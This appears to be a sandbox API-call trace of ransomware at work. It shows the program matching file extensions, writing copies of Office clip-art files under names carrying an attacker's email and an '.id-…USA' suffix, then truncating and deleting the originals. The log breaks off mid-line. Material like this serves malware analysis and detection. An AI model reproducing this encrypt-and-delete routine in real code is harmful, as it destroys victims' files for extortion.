[0271.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.104] lstrlenW (lpString=".1cd") returned 4 [0271.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.104] lstrlenW (lpString=".jpg") returned 4 [0271.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.105] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.105] lstrlenW (lpString="FD00297_.WMF") returned 12 [0271.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.106] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=18194) returned 1 [0271.106] CloseHandle (hObject=0x39c) returned 1 [0271.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf")) returned 0x20 [0271.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.106] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.106] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.106] GetLastError () returned 0x0 [0271.106] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x4712, lpOverlapped=0x0) returned 1 [0271.108] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x4720, lpOverlapped=0x0) returned 1 [0271.109] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.109] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.109] SetEndOfFile (hFile=0x348) returned 1 [0271.111] CloseHandle (hObject=0x348) returned 1 [0271.111] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.111] SetEndOfFile (hFile=0x39c) returned 1 [0271.114] CloseHandle (hObject=0x39c) returned 1 [0271.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf")) returned 1 [0271.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.115] lstrlenW (lpString=".doc") returned 4 [0271.115] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString=".docx") returned 5 [0271.115] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.115] lstrlenW (lpString=".pdf") returned 4 [0271.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString=".xls") returned 4 [0271.115] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.115] lstrlenW (lpString=".xlsx") returned 5 [0271.115] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.115] lstrlenW (lpString=".ppt") returned 4 [0271.115] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.115] lstrlenW (lpString=".zip") returned 4 [0271.115] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.115] lstrlenW (lpString=".rar") returned 4 [0271.115] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString=".bz2") returned 4 [0271.115] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString=".7z") returned 3 [0271.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.115] lstrlenW (lpString=".dbf") returned 4 [0271.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.115] lstrlenW (lpString=".1cd") returned 4 [0271.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.116] lstrlenW (lpString=".jpg") returned 4 [0271.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.116] lstrlenW (lpString=".doc") returned 4 [0271.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.116] lstrlenW (lpString=".docx") returned 5 [0271.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.116] lstrlenW (lpString=".pdf") returned 4 [0271.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.116] lstrlenW (lpString=".xls") returned 4 [0271.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.116] lstrlenW (lpString=".xlsx") returned 5 [0271.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.116] lstrlenW (lpString=".ppt") returned 4 [0271.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.116] lstrlenW (lpString=".zip") returned 4 [0271.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.262] lstrlenW (lpString=".rar") returned 4 [0271.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.262] lstrlenW (lpString=".bz2") returned 4 [0271.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.262] lstrlenW (lpString=".7z") returned 3 [0271.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.262] lstrlenW (lpString=".dbf") returned 4 [0271.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.263] lstrlenW (lpString=".1cd") returned 4 [0271.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63 [0271.263] lstrlenW (lpString=".jpg") returned 4 [0271.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.263] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.263] lstrlenW (lpString="FD00403_.WMF") returned 12 [0271.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.276] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=7878) returned 1 [0271.276] CloseHandle (hObject=0x3a8) returned 1 [0271.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf")) returned 0x20 [0271.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.276] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.276] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.277] GetLastError () returned 0x0 [0271.277] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1ec6, lpOverlapped=0x0) returned 1 [0271.282] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1ed0, lpOverlapped=0x0) returned 1 [0271.283] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.283] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.283] SetEndOfFile (hFile=0x388) returned 1 [0271.283] CloseHandle (hObject=0x388) returned 1 [0271.283] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.283] SetEndOfFile (hFile=0x3a8) returned 1 [0271.297] CloseHandle (hObject=0x3a8) returned 1 [0271.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.361] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf")) returned 1 [0271.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.361] lstrlenW (lpString=".doc") returned 4 [0271.361] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.361] lstrlenW (lpString=".docx") returned 5 [0271.361] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.361] lstrlenW (lpString=".pdf") returned 4 [0271.361] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.361] lstrlenW (lpString=".xls") returned 4 [0271.361] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.361] lstrlenW (lpString=".xlsx") returned 5 [0271.361] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.361] lstrlenW (lpString=".ppt") returned 4 [0271.361] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.361] lstrlenW (lpString=".zip") returned 4 [0271.361] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.361] lstrlenW (lpString=".rar") returned 4 [0271.361] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.361] lstrlenW (lpString=".bz2") returned 4 [0271.361] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.361] lstrlenW (lpString=".7z") returned 3 [0271.361] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.361] lstrlenW (lpString=".dbf") returned 4 [0271.362] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.362] lstrlenW (lpString=".1cd") returned 4 [0271.362] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.362] lstrlenW (lpString=".jpg") returned 4 [0271.362] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.362] lstrlenW (lpString=".doc") returned 4 [0271.362] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString=".docx") returned 5 [0271.362] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.362] lstrlenW (lpString=".pdf") returned 4 [0271.362] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString=".xls") returned 4 [0271.362] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.362] lstrlenW (lpString=".xlsx") returned 5 [0271.362] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.362] lstrlenW (lpString=".ppt") returned 4 [0271.362] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.362] lstrlenW (lpString=".zip") returned 4 [0271.362] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.362] lstrlenW (lpString=".rar") returned 4 [0271.362] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString=".bz2") returned 4 [0271.362] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.362] lstrlenW (lpString=".7z") returned 3 [0271.362] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.363] lstrlenW (lpString=".dbf") returned 4 [0271.363] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.363] lstrlenW (lpString=".1cd") returned 4 [0271.363] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63 [0271.363] lstrlenW (lpString=".jpg") returned 4 [0271.363] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.363] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.363] lstrlenW (lpString="FD00438_.WMF") returned 12 [0271.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.363] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5098) returned 1 [0271.363] CloseHandle (hObject=0x384) returned 1 [0271.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf")) returned 0x20 [0271.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.364] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.364] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.381] GetLastError () returned 0x0 [0271.381] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x13ea, lpOverlapped=0x0) returned 1 [0271.382] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x13f0, lpOverlapped=0x0) returned 1 [0271.383] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.383] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.383] SetEndOfFile (hFile=0x398) returned 1 [0271.383] CloseHandle (hObject=0x398) returned 1 [0271.383] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.383] SetEndOfFile (hFile=0x384) returned 1 [0271.386] CloseHandle (hObject=0x384) returned 1 [0271.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf")) returned 1 [0271.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.386] lstrlenW (lpString=".doc") returned 4 [0271.386] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.386] lstrlenW (lpString=".docx") returned 5 [0271.386] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.386] lstrlenW (lpString=".pdf") returned 4 [0271.386] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.386] lstrlenW (lpString=".xls") returned 4 [0271.386] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.386] lstrlenW (lpString=".xlsx") returned 5 [0271.387] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.387] lstrlenW (lpString=".ppt") returned 4 [0271.387] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString=".zip") returned 4 [0271.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.387] lstrlenW (lpString=".rar") returned 4 [0271.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString=".bz2") returned 4 [0271.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString=".7z") returned 3 [0271.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString=".dbf") returned 4 [0271.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString=".1cd") returned 4 [0271.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString=".jpg") returned 4 [0271.387] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.387] lstrlenW (lpString=".doc") returned 4 [0271.387] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.387] lstrlenW (lpString=".docx") returned 5 [0271.388] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.388] lstrlenW (lpString=".pdf") returned 4 [0271.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString=".xls") returned 4 [0271.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.388] lstrlenW (lpString=".xlsx") returned 5 [0271.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.388] lstrlenW (lpString=".ppt") returned 4 [0271.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.388] lstrlenW (lpString=".zip") returned 4 [0271.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.388] lstrlenW (lpString=".rar") returned 4 [0271.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString=".bz2") returned 4 [0271.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString=".7z") returned 3 [0271.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.388] lstrlenW (lpString=".dbf") returned 4 [0271.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.388] lstrlenW (lpString=".1cd") returned 4 [0271.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63 [0271.388] lstrlenW (lpString=".jpg") returned 4 [0271.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.388] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.389] lstrlenW (lpString="FD00459_.WMF") returned 12 [0271.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 